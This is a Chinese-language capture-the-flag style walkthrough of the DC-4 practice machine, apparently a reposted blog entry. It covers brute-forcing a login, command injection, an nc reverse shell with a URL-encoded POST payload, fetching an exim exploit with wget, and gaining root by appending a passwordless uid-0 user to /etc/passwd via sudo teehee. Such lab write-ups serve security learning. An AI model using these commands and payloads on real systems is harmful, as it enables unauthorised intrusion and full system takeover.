DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

这篇具有很好参考价值的文章主要介绍了DC-4靶场搭建及渗透实战详细过程(DC靶场系列)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一. 信息收集

1. 主机扫描

2. 端口扫描

3. 目录扫描

4. 页面信息探测

二. 渗透过程

1. 用户登入爆破

2. 任意命令执行

3. 反弹shell

4. Linux提权(假)

4. Linux提权(真)

5. 查找flag

三. 收获总结

1. netcat反弹shell命令

2. teehee提权


DC-4靶场下载地址https://www.five86.com/downloads/DC-4.zip

搭建过程和DC-1一样,将kali跟DC-4放同一网段即可

一. 信息收集

1. 主机扫描

arp-scan -l

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

2. 端口扫描

nmap -sS -p- 192.168.120.138

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

3. 目录扫描

dirsearch -u 192.168.120.138 -e * 

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

没发现啥有用的

4. 页面信息探测

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

除了一个登入框,啥也检测不出来,尝试爆破登入


二. 渗透过程

1. 用户登入爆破

随便输入用户名和密码,点击登入,用burpsuite抓包

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

将抓到的请求报文发送到攻击器

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

这里就只爆破密码,猜用户名是admin

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

加载网上top1000的弱口令密码,然后点击开始攻击

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

查看回显报文最长的包,得到密码happy,用该密码登入后继续点击submit

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

来到了命令执行的界面

2. 任意命令执行

burpsuite抓包,点击run,右键发到重放器 

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

可以看到,通过修改了POST传参radio的值达到了任意命令执行的效果

3. 反弹shell

通过尝试,不能echo命令写入木马,只好换一种方法进行反弹shell,这里试过了bash反弹不了,只能用nc反弹shell,参考Linux下几种反弹Shell方法的总结与理解

在kali上监听8080端口

nc -lvvp 8080

然后回到burpsite上,让DC-4靶机执行以下命令,将shell弹到kali监听的端口上

nc -e /bin/bash 192.168.120.129 8080

先将其URL编码

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

然后构造payload,POST传参

radio=%6e%63%20%2d%65%20%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%32%30%2e%31%32%39%20%38%30%38%30&submit=Run

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

反弹shell成功,接着升级为交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

接下来就是提权了,然后找flag了

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

4. Linux提权(假)

错误示范)前面打DC靶场学到的提权方式在这都不管用了,在搜索suid权限的二进制文件时,发现有exim命令,exim是Debian系统默认的MTA(邮件传输代理),可以从这个作为突破口进行提权

find / -perm -4000 -print 2>/dev/null

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

先看一下exim4的版本

exim4 --version

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

确定版本,接着找查提权漏洞,另开一个终端

searchsploit exim 4

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

选择对应版本的提权(Privilege Escalation)漏洞,完整path

/usr/share/exploitdb/exploits/linux/local/46996.sh

将文件拷贝到桌面,并在桌面开启一个http服务

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/桌面/hack.sh

python3 -m http.server 8888

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

接着回到反弹shell那边,下载hack.sh

wget http://192.168.120.129:8888/hack.sh

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

居然没有权限写入,那就cd去tmp目录吧,tmp目录所有用户都可以操作

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

下载完成后赋予该文件全部可执行的权限

chmod 777 hack.sh

然后执行该文件

./hack.sh

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

提权成功了一半!??

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)  好像忙活错了

4. Linux提权(真)

看别人wp,得从其他地方找突破口提权了,参考Linux的home目录

看一下该主机的普通用户,能不能尝试登进去寻找其他突破口

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

可以看到有三个普通用户,测试发现,只有jim用户才有权限查看,来到/home/jim/backups目录下

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

打开该文件,有一堆密码在(根据文件名提示,应该是之前用过的老密码)

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

将这些密码复制,然后放着一个文件里,用超级弱口令检查工具爆破

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

接着ssh远程登入一下,jim:jibril04

ssh jim@192.168.120.138

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

接着尝试打开刚才反弹shell打开不了的文件mbox 

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

 说我有一封来自root用户的信,接着我们去邮箱找一下/var/spool/mail

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

蛮有意思的哈,今天放假,老板让我把密码给你

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

用该账号密码登入ssh,charles:^xHhA&hvim0y

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

还不是root用户,跟git提权一样

sudo -l

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

发现了个root权限的命令teehee(小型文本编辑器),可以利用这个命令进行提权

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  #建议手打命令,复制粘贴可能不管用

可参考/etc/passwd文件解刨

简而言之,就是存放用户的文件,可以通过修改该文件达到添加用户的效果,文件格式为

[注册名]:[口令]:[用户标识号]:[组标识号]:[用户名]:[用户主目录]:[命令解析程序]

口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限

利用管道符配合teehee命令,在passwd文件里写入一个不用密码root权限的用户test 

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

提权成功

5. 查找flag

find / -name *flag.*

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

芜湖,通关

DC-4靶场搭建及渗透实战详细过程(DC靶场系列)


三. 收获总结

1. netcat反弹shell命令

nc -e /bin/bash [监听的IP] [监听的PORT]

2. teehee提权

原理就是通过修改passwd文件,添加一个无密码root权限的用户 文章来源地址https://www.toymoban.com/news/detail-446141.html

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

到了这里,关于DC-4靶场搭建及渗透实战详细过程(DC靶场系列)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(46)
  • 搭建BWAPP靶场(详细过程)

    bwapp是一款非常好用的漏洞演示平台,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含有100多个漏洞,涵盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 这里是在Ubuntu虚拟机上基于docker搭建的靶场 1

    2024年02月09日
    浏览(43)
  • 【DC渗透系列DC-4】

    一开始想到sql注入但是没有找到注入点 抓包后送到intruder进行爆破用户admin得到密码happy 点击commad后发现可能存在任意命令执行漏洞 抓个包,发现ls -l命令是radio参数后的值 改成pwd后放包试试 存在漏洞,有远程代码执行漏洞 可以利用此漏洞进行反弹shell 在home里发现三个人物

    2024年02月19日
    浏览(31)
  • 【DC渗透系列DC-2】

    开了80的http端口和7744的ssh的端口 尝试浏览器访问 url跳到http://dc-2/ /etc/hosts(linux系统) C:WindowsSystem32driversetchosts(Windows系统) 就好啦 发现是一个wordpress搭建的网站 flag中提示说要登录,找不到flag2就换个号登 找到http://dc-2/wp-admin/ 访问成功 开始爆破 kali密码攻击工具——

    2024年02月19日
    浏览(34)
  • sqli-labs-master靶场搭建详细过程(附下载链接)

    首先进行搭建准备,分别点击下载SQLi-LABS 以及phpstudy,下载网址如下。 将下载好的”sqli-labs-master.zip”进行解压。 将解压缩好的“sqli-labs-master”文件夹移动到“WWW”目录下。 在“WWWsqli-labssql-connections”路径下找到“db-creds.inc”文件。 打开后找到“$dbpass =”,在后面输入数

    2024年02月11日
    浏览(45)
  • DC-1靶机渗透测试详细教程

    DC-1下载:https://download.vulnhub.com/dc/DC-1.zip 攻击者kali   IP:192.168.1.9 受害者DC-1   IP:192.168.1.8 将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1 使用命令 arp-scan -l 列出当前局域网的所有设备

    2024年02月08日
    浏览(30)
  • DC-6靶机测试渗透详细教程

    1、首先扫描我们要渗透机器的IP 2、 接着我们扫描IP的端口和操作系统  我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问      发现没有任何注入点 3、接着我

    2024年02月17日
    浏览(32)
  • 记一次靶场搭建与渗透测试

    通过Windows7打入工作组环境,穿透两层内网拿到DC(域控制器)权限 环境搭建 网络拓扑 虚拟机网络配置 永恒之蓝外网打点 nmap -sS 192.168.2.0/24扫描外网存活主机,发现两台主机192.168.2.128和192.168.2.129,并且445端口都是打开的,可能存在永恒之蓝漏洞 用msf来进行永恒之蓝漏洞的

    2024年01月23日
    浏览(42)
  • VulnHub靶场渗透实战11-Billu_b0x

    kali:192.168.3.9 桥接模式。 靶机:192.168.3.12 桥接模式(nat模式也可以,我桥接是为了方便我物理机的浏览器访问) 1.arp扫描(也可用nmapC段发现),主机发现。 获取的靶机IP地址是:192.168.3.12。  2.扫描开启的端口和服务。  访问一下80端口开放的web页面。  2.看这页面可能存在

    2024年02月01日
    浏览(36)
  • 内网渗透思路学习——靶场实战——暗月项目七

    #免责声明: 本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。 靶场地址: https://pan.baidu.com/s/12pSYxSU-ZmurQ9–GFiaXQ 提取码: 3p47 项目七靶场渗透最终目的:获得域控中的flag.txt文件中的内容 项目七靶场环境是用 VMware Workstation 搭建,把环境

    2023年04月10日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包